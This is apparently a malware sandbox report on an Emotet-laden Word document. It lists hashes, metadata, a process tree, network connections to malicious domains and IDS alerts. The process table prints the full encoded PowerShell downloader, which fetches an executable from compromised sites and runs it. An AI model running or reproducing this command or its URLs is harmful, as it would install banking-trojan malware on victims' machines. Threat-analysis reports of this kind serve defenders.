File name: | in1.doc |
Full analysis: | https://app.any.run/tasks/27731115-1dff-4192-ac8b-a968d22a2820 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 20, 2019, 12:49:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: optimize PCI attitude, Subject: Licensed, Author: Ray Moen, Comments: Jewelery, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 16 14:32:00 2019, Last Saved Time/Date: Thu May 16 14:32:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0 |
MD5: | F3AE0ACE6557ECE43188C30D769443F3 |
SHA1: | 1C5CA07C0C6F60FBF9D1EC178067749AAAD7BD93 |
SHA256: | 5CCB438708F222F19C4FE396B87C6B246D9BC42B561443B7F4CD0C92DBC2547F |
SSDEEP: | 3072:577HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qQZjuYs72t34IQicZbp:577HUUUUUUUUUUUUUUUUUUUT52V5ZjuB |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | optimize PCI attitude |
Subject: | Licensed |
Author: | Ray Moen |
Keywords: | - |
Comments: | Jewelery |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:16 13:32:00 |
ModifyDate: | 2019:05:16 13:32:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 173 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Reichel Inc |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 202 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Gibson |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
332 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\in1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2484 | PowErsHell -enC JABIADIAOQA5ADAAOAAxADUAPQAnAFIAMQAzADYANgAxADQAJwA7ACQAWQA3ADUAMwA1AF8AMQAgAD0AIAAnADMANQAxACcAOwAkAHoANQAzADQANQA5AD0AJwBSAF8ANwA0ADIAMwA1ACcAOwAkAGoAMgA0ADMAMQA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZADcANQAzADUAXwAxACsAJwAuAGUAeABlACcAOwAkAFEAOQA1ADQAOQAwAD0AJwBWADMAMgBfADMAMgA3ACcAOwAkAEEAOQAxADQAMQA4AD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAagBlAGMAdAAnACkAIABOAGAARQBUAC4AdwBgAEUAYABCAEMATABpAGAAZQBuAHQAOwAkAFcAMABfADAAMwA2AD0AJwBoAHQAdABwADoALwAvAGkAdABlAGsAcwBjAG8AbQBwAGEAbgB5AC4AYwBvAG0ALwB3AHAALwBaAGIAUQBDAE4AcwBtAGYALwBAAGgAdAB0AHAAOgAvAC8AcAB1AG4AagBhAGIAdQBwAG4AZQB3AHMALgBjAG8AbQAvAG0AZQBuAHUAcwBsAC8AZABTAFkATABwAGIAcgBPAE0ALwBAAGgAdAB0AHAAOgAvAC8AbQBpAGsAeQBhAHMAawBpAHQAYQBwAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ASQBSAGIAUQBWAEUASABEAC8AQABoAHQAdABwADoALwAvAG8AZABhAHMAYQBqAGEALgBtAHkALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAyAHQAeQB1AGoAeABfAHUAbwBkAGMAOQAtADYANAAzADgAMQA5ADkAMQAvAEAAaAB0AHQAcAA6AC8ALwBkAGUAdgAuAHAAcwB1AGEAZABlAC4AYwBvAC4AdQBrAC8AdwBwAC8AVwB4AGEAcABGAHkAUgBxAHUALwAnAC4AcwBQAEwAaQB0ACgAJwBAACcAKQA7ACQAcQA5AF8ANgA0ADIAOQA2AD0AJwBBAF8AXwBfADEAMwAnADsAZgBvAHIAZQBhAGMAaAAoACQAVAA2ADUAXwAxADcANAAgAGkAbgAgACQAVwAwAF8AMAAzADYAKQB7AHQAcgB5AHsAJABBADkAMQA0ADEAOAAuAGQAbwB3AG4AbABPAEEARABmAEkATABFACgAJABUADYANQBfADEANwA0ACwAIAAkAGoAMgA0ADMAMQA4ACkAOwAkAGQAMgA5ADMANgAyAF8AXwA9ACcAYgAyADkAXwAwADMANQA4ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAagAyADQAMwAxADgAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADUAOQA0ADIAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAagAyADQAMwAxADgAOwAkAGgAOAA5ADgAOAAyADUANgA9ACcAawA0ADMAMQA0ADEAJwA7AGIAcgBlAGEAawA7ACQAcAA3ADUAOABfADEAPQAnAEMAMQA4ADYANABfADIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBfADYAOQAxADYANgAzAD0AJwBxADcAXwA3ADIAMAA2ADYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1792 | "C:\Users\admin\351.exe" | C:\Users\admin\351.exe | — | PowErsHell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2176 | --deb5006d | C:\Users\admin\351.exe | 351.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2196 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 351.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2920 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
128 | "C:\Users\admin\AppData\Local\soundser\oKOyp.exe" | C:\Users\admin\AppData\Local\soundser\oKOyp.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2748 | --6e1b8acb | C:\Users\admin\AppData\Local\soundser\oKOyp.exe | oKOyp.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2800 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | oKOyp.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3900 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFA8A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2484 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJ07ONEDAEMXKIUZ66HO.temp | — | |
MD5:— | SHA256:— | |||
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:3BB45249F5DCAB135638954EB123C31F | SHA256:7644A3FC82E37797B4A0BDE273A0E16384E00694454280DCC3C3D999CB25C141 | |||
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F2D5F16.wmf | wmf | |
MD5:B63BE7473C1B76F8E99A46159172C8D4 | SHA256:616D04554DA4E7B01D9A5AF63299995821D0404907B80CD853DE0616539CFAD0 | |||
332 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:946E0BB5DC107E8ED4F6FA5AF93B6997 | SHA256:48D75A3999E84C616FFEAA8F59069EBA387C75A6661E6BD3512ADCDDC7B41184 | |||
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\256981F.wmf | wmf | |
MD5:47008553A751D4AC0D368BA8D67DB132 | SHA256:B328A42326228EB95BA90BCC89B2456B3B0693C14A9E174E5B451EECCE833290 | |||
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$in1.doc | pgc | |
MD5:D265588843B6F955520FD26A701C1267 | SHA256:F9AF6147E83303BD8E7D230CA96B80DC7C90854953D251C92B3322E97593543B | |||
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EF96329.wmf | wmf | |
MD5:5220664E510AA370F19A6FD47450E715 | SHA256:25724565304BFEA207794C4A403A5E993F148864AB737FBD3652822C3EA8ED98 | |||
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A91EFDB.wmf | wmf | |
MD5:A6F44A0A5C7134025C56BADCC31BD9AC | SHA256:2F89CC7E7D946372404343147C8DC0C77A0AB0AC9C4351631CFA9A642F0AF3A2 | |||
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9B6F685.wmf | wmf | |
MD5:3A90559995537BB9D8699F079D9ACA05 | SHA256:662B5EB7201120EB138CE9A964789C70A46E8077AA8BDF24BD3F2E245EE16814 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2484 | PowErsHell.exe | GET | 200 | 31.186.8.168:80 | http://mikyaskitap.com/cgi-bin/IRbQVEHD/ | TR | — | — | malicious |
2484 | PowErsHell.exe | GET | 404 | 201.148.107.46:80 | http://itekscompany.com/wp/ZbQCNsmf/ | CL | html | 329 b | suspicious |
2484 | PowErsHell.exe | GET | 200 | 101.99.70.229:80 | http://odasaja.my/wp-content/02tyujx_uodc9-64381991/ | MY | executable | 74.0 Kb | suspicious |
2484 | PowErsHell.exe | GET | 404 | 107.161.176.66:80 | http://punjabupnews.com/menusl/dSYLpbrOM/ | US | html | 48.4 Kb | suspicious |
2920 | soundser.exe | POST | 200 | 69.251.12.43:80 | http://69.251.12.43/ringin/xian/ | US | binary | 65.6 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2484 | PowErsHell.exe | 107.161.176.66:80 | punjabupnews.com | HostDime.com, Inc. | US | unknown |
2484 | PowErsHell.exe | 201.148.107.46:80 | itekscompany.com | Gtd Internet S.A. | CL | suspicious |
2484 | PowErsHell.exe | 101.99.70.229:80 | odasaja.my | Shinjiru Technology Sdn Bhd | MY | suspicious |
2484 | PowErsHell.exe | 31.186.8.168:80 | mikyaskitap.com | SAGLAYICI Teknoloji Bilisim Yayincilik Hiz. Ticaret Ltd. Sti. | TR | malicious |
2920 | soundser.exe | 69.251.12.43:80 | — | Comcast Cable Communications, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
itekscompany.com |
| suspicious |
punjabupnews.com |
| suspicious |
mikyaskitap.com |
| malicious |
odasaja.my |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2484 | PowErsHell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2484 | PowErsHell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2484 | PowErsHell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2920 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |